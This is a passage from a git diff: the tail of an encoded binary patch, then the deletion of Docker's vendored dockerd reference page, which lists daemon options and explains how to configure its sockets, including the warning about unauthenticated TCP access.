zc9L5=Zn!OvVR4!dKt%2fR_yo;GS;ZPLkjI4+k)rL;!m2!MH%rO59d|Bhjb;0mu;Av
zlg+oNHK~{!&ky|l-_7emB{eafR4r=qhA>H6M45yb(cU@Lm@jmo3Q58lNwXsq^E;hY
z&P93R2mQJpN9bphPzt`tyIFUqG2T9d`>%U@VM&;R6~R#OZZalk>=d@ZhA5R=dYg|=
zy-R9Q+h*JN=ywyDPhV8N`656r^E*pI&b3HSjxyl|E(;_3&qnFxl)Rju^k*xWb6ndz
zlOD(=u~_2xZ4|1wYQ9w1i7D5)-D@eV#pi_Vn?UmX(cw8KG_(&nnV58)Hqg*=tSDT(
zM0?lcX{NJ??{DvbJd)(qTw%l?R83s*K56U2nWCdi`AZyOA5*P}BIdfO*cs3+wKi<~
z-G-89G*TrfCnTRr#x6A~9FeZmAIy||K4d(&Bg6YpH?~v0_mryGLtKj0sAvdE&rR8}
zR}N)K6r7edT@YE;9!sO(4u%Mm|Dd#q=+k&r=OqojFEGnjM*oYEM|JQQ%P`KI|A+jp
z8^MEuK1j1LLl)i0*#k+HSBV-NOKT%UyWw4W_i5)=MXKFwWY)tTgSUNwB%kpt`gj(T
zbEZ5HajH}HCA7LpxK=9_2`SQ?#v$CUkaNnX6NM<MsPnHM=wt24WbmJxoE=Le6+lCq
zW95#JwU|<x)1XhJO95^`-dB-5)Tczczm=yUQg&Zc`(8r{ZSb6MZp5Ai2_0h=`XcI4
z4sKsVFLEMpvSVyA&`+~9#Go&4M~!bv<+IGA-%~0hZBi>Td;}sO^8oc}!}|JHVW%*?
z6uMr~4b-0}*eCp45L?oj4ZgwK7VZ-?LEO@OIOcXmV3j;&Gzi1w`k7)D-(Hkqg7%dI
zDp_Gu*KUkvQKfXxYp?r0$-*EChsJh4ao7|2gqwv8G1ECcIIYo#a%BJ(hlF30$%{c;
zvUITuE3C6+n1(N62HPd_TKT2lm=o4Xk=-jwlg<;?yUHA^wlb<xo7}{JzPVNV_deC%
zKgvA&G)3$2xz~pIUq-XSthck3hO1_8J(>MHJQnjr;7B81jCzd&5s+Ztufthp;YM#*
ziSStyi6}0bFlgR#kRZGRiym*EEVUA`vg#RzP7F?W<{s*2Srjg-ZZSy8gCrej?$-wV
zqP@ZT(0rkKZt^bv>(1>5gw0>;c6%Hi6|yG1|2eey1m;*|-?=y3zw{#Z#@>amCkBu3
z*-?O#0mAtsNOLhnYw5_@8M{=fs8_45^~Nb?uBj-XV){g*;e>!4tLUn&c*u%v?#8v4
zryXJs?GuwLxLFIj;SQXRgI1%(H|K@V?R_=ti!|FPf5OM*5nv;+e^AZZzAQmVo6J@O
zZLF<{xwZBH=~a2~av{rlTk;7eBnT6VybI6tczEB^Q|w(48pzw9$IW+Vc%OKo)9LV<
zCmuJm=&!dDY)QnOvcPxg&8&=%EC<pjR6~HUqswdMO%XhKk~j;0&#iXK!BR9<E$mjc
z9fi#?IqGvU8tfd`qc_jE0O8FskvTxLIbURsRFQh*#e}T*3#&C7Z`Cwnl5*b4>Y&v>
zzG*9BL3AiMwAh)wMgZQ~jlmq$wP^~rGfhi3iIS|)RwKWg;eDUg3f2fj)%_D|_=NiR
z+tUOUbi7^S&&jn8tq;oN4;N!TY)j7Hz<cP?%8jm-o7a8NC9OZ~iX7Ki&}}`aCvQRd
z7~(`hl#b&2o7ZpQKCUl;PX&TzD?SohJ~rpVEnMY_tjWz$IN8Zp9{#v+;n2Hg;6w8}
zzBiu~ft}CEj<!==CarHkZOSLC4XjN$<~0Q<GjDyBJvlij4;gG+KE8nzl;e|Ii`ThE
zU`z0RHa&6O{qVdgrgGvqZ4*6UJ3qR)v9#IR?0ajQ&nL!u^f1}M7GfShVP$(<tE<32
z!;WLYS~>eA%l)h2v7^T`KF|3b*Rnl&8T@8g;mmXY3Yryg#Ma+nl@cK0YqsjITP!52
z<?}`3+i;Fg4Cy<cr@!dzmkKy@Z%2T~E8y5bZqDu?<sbedF(=0BLw;~a-e?V<PQ}#5
zWa~Tw^q!rx*Zh%S`O};`;EV0A`v&7VC*FwYoV;ieY!MTrE9O^mBA_buc<qT`-ZZ<b
zLg2IMonS?(^-_oF?U+-msi8|_rz~_cMJcl!-?>P1$o?PnhpE3zp8odo48C?^yXM#y
zHf?LUW2=4a(%TNxTa{4jWz{=!TX!#qxUC|3&P3%uM(lcfifOQ&j*HkGxXl+EVf27c
zly$n9J5)pbcdzEL`GLO!9pIvC*j=ND<ueiJz<+C(t<--;qzQ6B+ob=mhKwvNo%=s(
z$WpJ={-=hFUf=Y8YRInM?C9#g)7kUiHDslIBlpHHjotsR8nS|kshNQ%PybUx)-t>B
z>iQ!4KQ&~@%WvNozWczbA!B~r{8pF$eTUOS*8FvQ^Y1?hB@=X+LZosFtNw{S<GVLm
zK*4c^J6ygaQ%pD5IyJoJc8;u7=E~DBMI*YBd!tNBL|uEHhW`VPrxEoxOAI34t0hMU
z8Wx!+p^nc)1{pDIuPCWE=I@@aCr9gC+B&KFv<Y$3?`dsx(`=gSz}S1$jvFRzCw5gi
zPh9nz>u7j3R4(nTairqR=l3arvA1e_FCYp(^c1$RhuisI9mww7+%p!5=OC|+5#AH|
zx(B&#{Kl?MGPKVdn3~)<`MAtgS@mYOzWlRezCE6Q71KV-VC5GkHv>A_X8M!TzJLr)
z4ViiJp1hmAx2do1ap@gHpX>g<56_Sm+zH=>!a{705(ZNN<bGN+#Lf!fen%^<U($7O
zl@kU(!qbN7uNeJ1j><u?mI>M;;=>n_CYH%DZ>wgl&p9iqEXi}r1QO4S1|1wsmXXgJ
z3Mb42CdC*;1<B*>WMZw)y9Uj^$k0+Hmq9zH!+fH(V%}PYYy2r34mVywDx3oz{(Kb)
z*eeGdcAg7^xY5@CrL;Zyrr?mH@zJY3G4GD&OO#Qpk`Er|0b=)MiY8y;RNxFEl|~3}
z%c7p0d|MtjMxY_%f4qBJsg%tG5u>Lu@PQ9qg-V_d93~CcRa+XV&G!ucj~$`$U42>1
zd&0GS4*?L6Q1pEw?5q_I?_f!H-X{r~ZP16~j7PSDn@E^&SlGF@v%y6V*}@d46g#!v
zI<D08PJj<d9JY2<#KM9Gopgv-mV!xyxYNa7-DOMJRe&gKY9fzfEt`fmgL9K_4Y*iC
zfRf6o&wamEO|SC;bR0&Q<gssv8;hgXhOd-lHFs;zk(&g&l?LHkedge;(T4g5)<R7~
zB}r)QLs>UF7A%!HJEjogP&Y|J@)prxk@5MV-fY=BG{7!$7BcH3T5=%|%~2nyv6u*~
z6SH(e*a<U;K&$aD5L3qR<iQ7KMO!+1zY3lDI!pP`V>R$rCf5oj4IhyKv2k=7+B~R_
zgN@J8X*)dFg@ZDXbS-^2)4S9P0qCTi{<So|{722udIV#Mu$QL}zObfCx(Zv*T}ph;
zSr1zBqq&=%g`k<NU+)?sgK0p7)e~z0W$TSH081w#u#SA+V5}Y;cQy}OMo)TEZIMKR
zt}EZ_t>dL^Jp7<Ij-*0(7SL&D$HLIQq3BxYHXp(uATUu_X(j;3WIAC8>pVn`hJoJW
z;JOh;+eX)7Onwc9FsZ)*>s^SbRg_#Z!xFi%_~(S1v=ICVz>`IGqNd~};vOK6_RI){
zl4*{TzTCKE(vng;$7)JRE`+L3fz%-fUJ}>J?HO)U`|Co@0P^P+i1MT)@3;&C0AH;Q
z#*)L$bg~nijcI&8tf-iVGqm<!xk5&D$yk^O7nhJg6q$gQ2}I^^fm~%&2ncwe#**}}
zOT|IJA(q?WmE~GamS35F2~a0LL+Vjrd;kvN0Tbz*A{TM^QM$$pl<-v~0C!U3$md3R
z#aP$nIFI3>hxyzqYp_B96Unf)tW%-V9KK`RCFc@rmADcOJspvuBQr|M2M~bM6z|#u
zrS$?pbr%DH?vWXYJ0MFTnQEp?toF(YgEo_i#ko#g+<F@Xr(j0}4<jGxbMiWrAK`A%
zAR-hJe;p4{xZ57q3o9~QlvO|=SWj%yFDQ94e8&+nS;K{uc}f-fILf^}$oy9wpNR};
zbANUtU+5@>CPj&Kb0iAMotlFHA2wHtH%G6FAvm=Yp#oJrik0S)t}|2hUX5s4P6oi_
za4r=lzE1DK)BzKYV4+AJMZZVDT2sUvTK02QNEG1$f)F<q8dRjTXu+~GIs9vh!bbrh
zTHcqd6ea>|#s-)_K(-YF5YX2Gv<{;nO-4Sic?+zN-B@dt{@$a><T?Ui*4N~Dl$C|u
zuYbOugYYzY9pu;=IHhKH7iN&MxGX_^YC}5j&;`rdnf+Q%uNU|MXs_<+^B@(t>jMG(
z?~=J{pYryGEE(BkO!T<CPuto3RISd##BOMRCWr{LL>m<+?iBpEbG=T)*MI){=+H6}
zg`-;N`y(I~prqjC$nm`eWaVu2)WnbLwW^1c95Q~C8kruiKMH`3B<9^1vun{GjjyMf
zfV@07fIpZu_C<q{a}}jozr01;E^=wjj!r>ytd#aA>UkwF%!rzajCb<i7|Eiy&Z_HA
zp1Ba~rh){n;aVU^USQyzO<*!Xe`)s}N@=g!n;^}CB_~lvk3G)A2wczH^}Rvg;6#|R
z%){&Nzckg(Kbiq_y8U$8#N9uOXaaFke#(D}MxI9x@t|<m4O)MV>qnhd23zKxBoB&m
z9c~G>jl%6ZMY~tpxD%=_XtG2Xz}>NF-kn~+I^x&|^tsq`c-~VkQO%MM3LB3*d=K$d
z{v`=SehRf2odANTjYOCCd{rsoIQx#=m^QPw7Lf9=5K|oD(ZIbI4k5mG3p|X;@A!r<
zVV|_rs+tkd9l`n$5ejuBhADB;*Let;5b4>&Tw-MX7_XnQ3=tU7p~ZzY(9AmSPP$Ov
zki-E1vqs?(Z^?)4PXz(M^tgP{a_g18b-FAt-mV7lhi!n8PMOc2js2*7_-=hS5_o=8
zKuh&k3`$-Fhja}~gtGHtc>FOp_pk4?2Tq*0IOQplK@zUeOUIIwEB|qKGKC50=#?~#
zEE$X6DZxPeoocT^IiqnKm&`k$wD3^Bh(NCqAW=4rOjf0Gs{n~+(>}05k#?{q`H+PD
z1Ei3O06g-+1rSMaQ$-R>J+%NV8}l~hW&C61?@5BVXKq?WFHf2lf3wRF=i&XuM0HGF
z*R1rjmf=Z((s@(3Ly#y5qOiz@XS%YH<8-NMau>HR;1|l|>CdEEyfsJmh;zv5U!Az3
zmc)!rj=cd#<v|U`k&G^UDX1(;B!P0;0}EJf&8tF+$DjN}k-le?zx$v)8kN#k;bw`f
zuL~BOnsa}EbiEjL{EIPaQ$6-5M>6cnwb^M&$4w_OflDY-nY$I93tD^hPgZ0H|5_0G
z{hz&8i39S*qgx=7TKJO-yr5F_N>l>Jo^Y3AZasPUu~v(D$xgfTO`ar54FGn3fgji)
zjWGyyC{Az4JV{Se<EsLvSWi1F_V2-P0C!S)171lBws(t9#^ADak)kTdomqI7L~J!1
z5|2n2Ts`>XC(R(~Vhs_%tDqDtW0!St&KNyqGKd|AOADz}%Er??K<QhRWSsd;Tcl`<
zk)aXNSOrN4Q;|k;Ib#sAWIRMUFZxCIPNb}>3UYs3idT{1GdmRe9!(vY6cTrF%NB(q
zdes1OfAO6Acw&Q?9+qe(i@{r}AaknqbA}MxBqZOmrUK6n5MY^>6qd##1mE;bN#4M7
zWAITDc+S@Yq^14&NqU@720+eephHitr8c~!oi55u_?BA3se`gdnJ$BSZ_B+OhVb-V
z+!RHPu;7d7vA67H`VoKw64<B0X@NRN!(`nqGIwTS^6ZgZLW;4S$qGX9560~W#4a_k
zfb^iuOT>$f5;;S5C_Z^oHPf6Ug_EYA=jbq_jf^I*z}>#m3PO;vmK<3Json<S?T{nb
zM9v@}Pl;o%&H3;P#<QWjxg4@P#}f(ch0b3o)P+yd*AF2D+b&iUWe{&JWdJ$L5_wnU
zlhkrAG}7Tp2{6J)lLMD>Z{%tI_Tr}R$ow`!LSYc7VyHl~7NpV0)I1&<sC7M~DlRsK
z2#_GT1RkzHHzY9wY43n?WuB4!eW^hu?@$Iok$`fh03)#|G&vJyT^h;t=sR>}aZ0w%
z5c%_K+^ry_Z#?obG6g0oiIOu_ypp01W~N}^Xa|&~al!%K!h^*Hsm26v0?LjEe0hs>
zWrNZbV;()E8nciVc2!V0<!2c5#IOKy0F=6Zna=r@H3+GKlx3c>!vXKD5a)gu<r*XF
zf6HH=kAQ(ANe)H7zgW(-LzA|IlrDnd#<5}@tKw>e0`<t7D@B?24a|#q^XsM0-`$(z
zuA0iqGN;6LsHBlMb`-TY3?z5~2hnoicVeD+gnvAQh=xV!kQybTAtoEhsCYe_Th4^z
zlS;e1khpn5h_z3hjYH?bqm^ymW%)MV$%G?3jEVc14NMq~DX63)9BepmA()ndbV@?j
z#8#yet8!Ve9mcxQ5Q*y!R&Yca69M!_*|r1n?>wPp#Q7=>8hA&z9p%b%m{4e4Q@C7H
z3DqjRV_e_BKP#5J1OW@bt1~e*Wz&HrZ9wl`g8MVV=^u{#2?W!Yn##7iQJdQ9L>SA`
z)NmAc($d6IDxDILxD12|B}io>O5Vn8fF~f_hF}jMRJ0H$3a*_E_B_yNMO<}J*7wy1
zb^>%A3043?fgEV6B`aY=Frn0Byt#HR_z3;ErIjO}F-1#}Tor}CpzL13*&zsG$}n$i
zq!^&Q7QkrN40+@EUjG2da#3YKn06qq8eFS|yQL28{tm)KJL{j$;kyrbJayrsduv#8
za>Nc?bUPxahpGjk^PM9?fhDzoTW_0sGF_e=zNu4irh|geiHJ*BLKsv7^#>a>$>3-z
z;j#|FNI`e)wqwijqaR0r6Hg)dFub;M>k8Cz<qPQYGZa$wzGCU^Q%K6-G;T(L!BJq@
z9jM;j)nBp2g~<77E$3A4dGVRCRXFugjBZf}Cd82!2Cg+<VuSNncTW7WIpY#`G}EMM
zSCfk^Gr$A@ju{g6Zr|qm;AYixbS}EC)6U0M%f_+=c)!xhcNRP=5AkeRkfhI&dkEq!
z@jY~yK*nR)&~X!yEWLVeI;8xeEt3iP1QXIvI0AG#xtQC;81VfJG-3=nEITIb0h+&o
z)_aa?==*&XJwC<F;AE{;^a<o`my-AJ`45g>O$07-b`OPUQ)@vc!5_bRVQV`Iapr?>
zJANH-jlUBRwT}=p;rQBwU_?1s`@P$SyEEUi$JMj5_)Citk@1PET|AZ0w(WeS=h!<d
zesdxuS{>iMD$Mby%7)2t6CnZK?p)5H8&5dXb3DFwC-7YA?WQJp&l^V!(`I>(-5u{c
z7gKwR@)`!B4);ws@H!H7DDaz!&ePrmC0zVHhPC9h{nMIC>D;||h5>_@IkU}a1O!Ut
z56dv40cw*j`?N%=!`(aG*@p?cF;?nC2g%+ekRy0vq!VuzTJ90*0zf&d9FiZ{#l4Rc
zr8XsU9tU_I%hpN@R(huNEEtNP8FXnGY>ytkd5{3N)Q)e!=5%Pl3b-<i@HfRcF%bkR
z_>*KxpvLj6^E%;xUG=2X)_@@ew!RB2iA1{}jMi!I7Qr0|PO;OaM7ykxg_$7`0HA<T
zjb89LbS={CZ3r*U&JPCoi00g9cK}WDJ`4l)R{$o*G)H|+lyLWS+Q$tK6I5F==Kh1?
zfx%XQC{C$U7t`}vQIuhbWP=)vdaqvIIm5bgojS9$eML0b%4wo8_H3oj$fEwpZDkiL
zr{Q8h7@~|kW#yHs?Y$(Tq{q_v%)vG{6oYm5HmoBgyB}0g0k~0<!~duK*2i!jt}r;}
zHi)7sLJUBnMaO{oa0bwV6wa^S0M2uA-XV{wT1pnqY3`<4@lwycEYqZVKV~ywbMnbJ
zEB#Y7fG8VOZqfMIwuhux(5R#SGy;+hD@<^g;bs~9hv?rJ`Ed>vo8DLn4aqQ1?__Hx
zylC6PsT*_h4`N3^_hH!;zu3(*4P}N#y~8OzBBIvzvH|Of9tMH;S68O0OH)CeBRbE0
zftY(N)H@BlI={j+lYmY-I@63A)U(r4*Q3nX-&FU_05o}JUx#Zs=*Y4+^N<YSLF|*)
z*EDQ}Va(pAEH(ns0^B_NbOOQA)dEjG2tV|lRW`22u^*h<Wnc?H00unSBb?+s*T^v?
zMSuo{bE#GX)`37mm&hf;{BsK8uQZ?<4b-21-cbI$vG4hfm(QF3K5yCeqTvYO#si2l
zp4wvP8Jw{)20r!(V(wZP+Pg4vWMS<5!g%?@gT95~kI;n7RM+46p1m*cF<#7^f4Pp^
zc{$hjvYYa9;qS{V_DlBOMK03f>Lcv)^Na64ihOvvsJXPbQO>u#>($)eSKpjp{y6`t
zr~K8H`uv}luVVhb0%WHlbM`YIHh0A+hoGJ5Ve>b42>fGzl3Eh#uNOJGq?xcJQBf+@
zzjR=JN%qqvoa}P2(X!%&1f>hh%&W_)&HieO%TwQ%wVFM2%wJD=yf)A<xgoZ|S&9!G
zd1UPJYWb`BfY=I9F~zDHunlE{L$XnKSGfCe>s1fPF0YW6v=01Z%R#$F%HI4emuKNw
zNBbAY&G!0FvQ7PDs^V9-oE1mG>5vPH{?F&aE7)9LGNJ|8g4OBqvJRZ|QQX(vH1nOc
z<o?~s7uM24cb^`HJQm;X9}E_C1KhkJs@uD(p&VvYxv>9T*-_=)I7mb~Qw><jF&EL$
z0uW@VFMB?X0Pm*0M|iz=9E1gln%xiIr**-9z5rnwANFkS;%#}~IXP=d2UeFpSYcs^
z2;MbcC-lK0%#!g>!cD(VPkvgL!~uThAEmVm=Ffec6aba(f7Ic`*10}S=D^O@pS1Dj
z|FS=I9^Gd%`AHTFz7pV=Dzd+62=P^){WbaC|H<0+CyXMcbDV}yVShgN6w+j#)x||M
zH(4%tS}I#xDln~ju35@^5RkXdnj~))=^*w{Esb!Ssgb}-qYddqV77Ee&7Kj;v8Zgq
z`{jtB`-6Rk!7gLDLw*4P0r@dMtICcB$ec%g)j3As4Dc`JALAv~m>iQK{LxpU7pvaF
z3RagrfI#gDx6<P<0`t89`WWs_kZVCOMxts19IeQ1KdwHii2Cui`TK1ftKOA;Ot=ih
zt-GE0!H6<ivwDBP0<)YncO=+*TL@?x0eD#J@-0IH8IkVqoiiPO{I39x2yyq;zD-(c
z_)doSPB2e!8$&oVcE85}gikZ|H1C0*5O>(@#nMLN6~XAFw?bM2Eg)LI>B#CvQ5F@c
zXXP~!1@+>^`jq1OlY&z^#Z$uEwzlu1liC8lr!1ny(x<NwcbG3A98xP*{{WZ-0RaF3
zLT3cjMEjJ210^sj^V&&W^;I6E0h@JIS+!M@QvF%>O@w7wKl?)vut|m${^PH7WS_0u
z3J5|@gM@{KhlKz<P>hX^kC2g)la!T~mzbHFo1C4VpP-?lqok##r91$LtE>yEgg*cx
zMgR*+PD2C&MuQqiPD=nShd>7aD1*Vsg*wIn8iytT1h=k*u_A;k001zAAKin}BZkGt
zgDWP3v=prFhl;22^Yr!h_xSnx`~01$?*N@Zcr_>%iW>mb4VsbA$%-4vgsm!&AmTDZ
zMqJ@I)B->afdrix95jT%3jz(DSR-T%5ye3TE{K?UfI&cj@%ri9|H-qb&!0epq6&HQ
zkcN;rJnoRV4nT&IHKNJ@@Sz4TLm~oLTqPuBAtdLH7E1cjNr8_@7y$Soa6ln&g0N~;
z0svysn>mH*-OIPH-@kwx{kw|@1%M%h7!INJA<>5&1tLcVAfUiTLoF6;ojB~!0EmVW
zFFfpI>5`@;oPYpu)rsNOgfas=M;Pa#z_@ek-p#xBqrtTc(egHEgk~oc4iFj=&Jfc>
z5ELp~r6hppLOTZB8cxXgppLB>K<fcu1|bav5JiWXo{$XK!JXvwO~1bV`}juzk6*mv
zpaX0<A%p-s4Dy0<@N_nW2tW)XgiQ|0LI@7Txz?EqojIXF|5;9q;GYu!lEl;!0+jVZ
zJ208IV1oie=tM^h>;Qxb8S*FJZTaP><BmMix1WtAP|$)26*>V#bSO{&-ylr=AOHXm
zlyK1x7XVNI45z&yfB+w$P+%_r3?RY?0TL4AkVWE<zy~WpP-6)iw2;9I1w9$%MdEPd
zm5n#{=;xn+2D;OaeEx!n5x3m5*iD8Sf<#=aG>Xx6hEPh<l7v9YCzCh|>glJThMEbX
zo0e+osi?*`pQx<1>MEe5rYh^Kw4S=^tGMQ>>u#~u>g%t-x^wHU#1?C8PrU}K?6S2E
zd+f8&Mr%s4%vNhHpUz6F?Y7)jLhZHSh8s|}-Ii;v|F++XtM0mlkbCaC@amc_yYzzV
zZoK&B`{}&y2%*Ad4%OHputTWuB`ZtZkeYx71Ej+U09$*nz7$uiBfqOG*qlnoIS9e8
zMu@QSDl<fe%TeaJ^8+|VRy(o9FvrXr#$1hT2nqtv%3RBcpjS|N00Ck1AxcDC6wmN<
zD)Z7z&rDQs%%zOT0+^=C-8&i}7>m@bbcJ*wZq^2wZB3VLc3{-vpo0@Lpg`#kD4>v(
z)J8~M(lslfz+ypp1AM~@-Yn6=3S9q?H;cn50fXCxDDi>`HDvws434YNS`AWry&Mc9
zaG1d}FI=Sq&WSpK#Nsm`w!@Y$*tN>bXU8u4|2@4bag+uch%f*(;(V}#5d)?CLI4Ol
zp@Is8n4pf(<aDUP5I`gVL81w?N1}_$8wmh8j6pC00oswoKo3s50D#udEI>g30t8rq
zTM-i1rV~aKFw7D#08qjXw|p=I5E&SNAe69x(`djvKybhSWF#!5&F+B^yoV0}P&!0F
zX%Gm3NK#JYg#1Yj0>xv1Xll?NCuG1TFc1I-nF9?ImT&<OA|WA8NI$Azur7mOz{1Re
zzQ%|I01*1Y!88Y=Y&hWpC=#0d6vB=deas0(NZAESNF4z9Ac9!T;yjK308PQehs+rU
z1Y8s~LR<hrM)=SId{_t=7NP(EI86p#{|KQq9)cDtXi6TJ0x-$_&~<95VEoo`3n453
zK}v*)OlV>g9Xz9gQ+!8Pj-bU#S~3(sV}%WCI1DZ=CzD4+(2&}NCnh~{5FA*G3kl&y
z`INGTd4#1ySaTlqxo!ji*juJHh652q4w2!Yi|Y!3O950UlI~#0C6~#}OhkZ<7W5%4
zh5>*Nm2nVf90UaR2E;??q7b23<se$wO^g5_mUwi6G^FOoSh#K*94rJ8P4GlNCUQE6
zz=1KAflO9>AOg({s6Zj%0{Fd7ni5F>01S1_P&z>g#dCr}uVbDnmFWWT(||!+Inl((
zQkFH4P%msr2nw81p5Z700O+J4|6mfwWbQFSg&@$Ley(BwE*Pjz1=@s_t|Ay5_!;sT
zl7T@OMg)n<Cg%zf(ktQM12VvcNS#0c;^YrYFnHfBnhJxbMl}`+5t>2{Kp^_*qCv4B
zjuHmIA`rCD3FOIRS0J#29e{5MOQ1_*fB+*I(Z~rUxQuL^AhID0A)bXWUlVr9SZ0!d
ziiB8#$Ov!)BUEVtY*9e~fVcuNu_&7qAYUO;NEw!vrT`<j0S7X)1hpKX1{t7$Ri7jP
zIvL?}2iSoTjuIjxsHFfJFllE#aDWk*Km&WLUO^~Oi;aNe051sX^gsduUPyx*3NgU}
zS}+3!4Pq$*$QevX(Ae@?|B?v;*x_9;Wl|>?jS!d`LYW%JimFlPG>BaXVe$)KLwM12
z`NiuhN+19xnD@Y0qyYd9#wQAZpk5Fr%u;B8;0i}@0|T%WVM@@T1aK(AAZEo72CxAO
zn|O9lXg~opTomSV;FTecF-Z#0fG3>z#%F6n0|>xi8T*(|c5T37aZKc<Jplu>`LU9N
zV;BtBxX4gunhON*+9g{#AT=OsPNU4_r6pkl=QDw5uS{mRn!o@6*gz7x%;u#X;RI-&
zh5-&h=Q`W@&UntVp7+e>KKuF4fDW{s4S*5=7~lkyY_p=hoP!v+fCZ3_w4^6Z=}KGr
z(wNS)rZ>&$PD|PaCNaptnioy#Qk(kJs7|%2SIz2HyZY6zj<u|3P3v0Q`qsGKM<4(I
EJItD)iU0rr

diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md b/vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md
deleted file mode 100644
index 24ac77611d..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md
+++ /dev/null
@@ -1,1364 +0,0 @@
----
-title: "dockerd"
-aliases: ["/engine/reference/commandline/daemon/"]
-description: "The daemon command description and usage"
-keywords: "container, daemon, runtime"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# daemon
-
-```markdown
-Usage: dockerd [OPTIONS]
-
-A self-sufficient runtime for containers.
-
-Options:
-      --add-runtime value                     Register an additional OCI compatible runtime (default [])
-      --api-cors-header string                Set CORS headers in the Engine API
-      --authorization-plugin value            Authorization plugins to load (default [])
-      --bip string                            Specify network bridge IP
-  -b, --bridge string                         Attach containers to a network bridge
-      --cgroup-parent string                  Set parent cgroup for all containers
-      --cluster-advertise string              Address or interface name to advertise
-      --cluster-store string                  URL of the distributed storage backend
-      --cluster-store-opt value               Set cluster store options (default map[])
-      --config-file string                    Daemon configuration file (default "/etc/docker/daemon.json")
-      --containerd string                     Path to containerd socket
-  -D, --debug                                 Enable debug mode
-      --default-gateway value                 Container default gateway IPv4 address
-      --default-gateway-v6 value              Container default gateway IPv6 address
-      --default-runtime string                Default OCI runtime for containers (default "runc")
-      --default-ulimit value                  Default ulimits for containers (default [])
-      --disable-legacy-registry               Disable contacting legacy registries
-      --dns value                             DNS server to use (default [])
-      --dns-opt value                         DNS options to use (default [])
-      --dns-search value                      DNS search domains to use (default [])
-      --exec-opt value                        Runtime execution options (default [])
-      --exec-root string                      Root directory for execution state files (default "/var/run/docker")
-      --experimental                          Enable experimental features
-      --fixed-cidr string                     IPv4 subnet for fixed IPs
-      --fixed-cidr-v6 string                  IPv6 subnet for fixed IPs
-  -g, --graph string                          Root of the Docker runtime (default "/var/lib/docker")
-  -G, --group string                          Group for the unix socket (default "docker")
-      --help                                  Print usage
-  -H, --host value                            Daemon socket(s) to connect to (default [])
-      --icc                                   Enable inter-container communication (default true)
-      --init                                  Run an init in the container to forward signals and reap processes
-      --init-path string                      Path to the docker-init binary
-      --insecure-registry value               Enable insecure registry communication (default [])
-      --ip value                              Default IP when binding container ports (default 0.0.0.0)
-      --ip-forward                            Enable net.ipv4.ip_forward (default true)
-      --ip-masq                               Enable IP masquerading (default true)
-      --iptables                              Enable addition of iptables rules (default true)
-      --ipv6                                  Enable IPv6 networking
-      --label value                           Set key=value labels to the daemon (default [])
-      --live-restore                          Enable live restore of docker when containers are still running (Linux only)
-      --log-driver string                     Default driver for container logs (default "json-file")
-  -l, --log-level string                      Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info")
-      --log-opt value                         Default log driver options for containers (default map[])
-      --max-concurrent-downloads int          Set the max concurrent downloads for each pull (default 3)
-      --max-concurrent-uploads int            Set the max concurrent uploads for each push (default 5)
-      --metrics-addr string                   Set address and port to serve the metrics api (default "")
-      --mtu int                               Set the containers network MTU
-      --oom-score-adjust int                  Set the oom_score_adj for the daemon (default -500)
-  -p, --pidfile string                        Path to use for daemon PID file (default "/var/run/docker.pid")
-      --raw-logs                              Full timestamps without ANSI coloring
-      --registry-mirror value                 Preferred Docker registry mirror (default [])
-      --seccomp-profile value                 Path to seccomp profile
-      --selinux-enabled                       Enable selinux support
-      --shutdown-timeout=15                   Set the shutdown timeout value in seconds
-  -s, --storage-driver string                 Storage driver to use
-      --storage-opt value                     Storage driver options (default [])
-      --swarm-default-advertise-addr string   Set default address or interface for swarm advertised address
-      --tls                                   Use TLS; implied by --tlsverify
-      --tlscacert string                      Trust certs signed only by this CA (default "/root/.docker/ca.pem")
-      --tlscert string                        Path to TLS certificate file (default "/root/.docker/cert.pem")
-      --tlskey string                         Path to TLS key file (default "/root/.docker/key.pem")
-      --tlsverify                             Use TLS and verify the remote
-      --userland-proxy                        Use userland proxy for loopback traffic (default true)
-      --userland-proxy-path string            Path to the userland proxy binary
-      --userns-remap string                   User/Group setting for user namespaces
-  -v, --version                               Print version information and quit
-```
-
-Options with [] may be specified multiple times.
-
-dockerd is the persistent process that manages containers. Docker
-uses different binaries for the daemon and client. To run the daemon you
-type `dockerd`.
-
-To run the daemon with debug output, use `dockerd -D`.
-
-## Daemon socket option
-
-The Docker daemon can listen for [Docker Engine API](../api/)
-requests via three different types of Socket: `unix`, `tcp`, and `fd`.
-
-By default, a `unix` domain socket (or IPC socket) is created at
-`/var/run/docker.sock`, requiring either `root` permission, or `docker` group
-membership.
-
-If you need to access the Docker daemon remotely, you need to enable the `tcp`
-Socket. Beware that the default setup provides un-encrypted and
-un-authenticated direct access to the Docker daemon - and should be secured
-either using the [built in HTTPS encrypted socket](https://docs.docker.com/engine/security/https/), or by
-putting a secure web proxy in front of it. You can listen on port `2375` on all
-network interfaces with `-H tcp://0.0.0.0:2375`, or on a particular network
-interface using its IP address: `-H tcp://192.168.59.103:2375`. It is
-conventional to use port `2375` for un-encrypted, and port `2376` for encrypted
-communication with the daemon.
-
-> **Note:**
-> If you're using an HTTPS encrypted socket, keep in mind that only
-> TLS1.0 and greater are supported. Protocols SSLv3 and under are not
-> supported anymore for security reasons.
-
-On Systemd based systems, you can communicate with the daemon via
-[Systemd socket activation](http://0pointer.de/blog/projects/socket-activation.html),
-use `dockerd -H fd://`. Using `fd://` will work perfectly for most setups but
-you can also specify individual sockets: `dockerd -H fd://3`. If the
-specified socket activated files aren't found, then Docker will exit. You can
-find examples of using Systemd socket activation with Docker and Systemd in the
-[Docker source tree](https://github.com/docker/docker/tree/master/contrib/init/systemd/).
-
-You can configure the Docker daemon to listen to multiple sockets at the same
-time using multiple `-H` options:
-
-```bash
-# listen using the default unix socket, and on 2 specific IP addresses on this host.
-$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://192.168.59.106 -H tcp://10.10.10.2
-```
-
-The Docker client will honor the `DOCKER_HOST` environment variable to set the
-`-H` flag for the client.
-
-```bash
-$ docker -H tcp://0.0.0.0:2375 ps
-# or
-$ export DOCKER_HOST="tcp://0.0.0.0:2375"
-$ docker ps
-# both are equal
-```
-
-Setting the `DOCKER_TLS_VERIFY` environment variable to any value other than
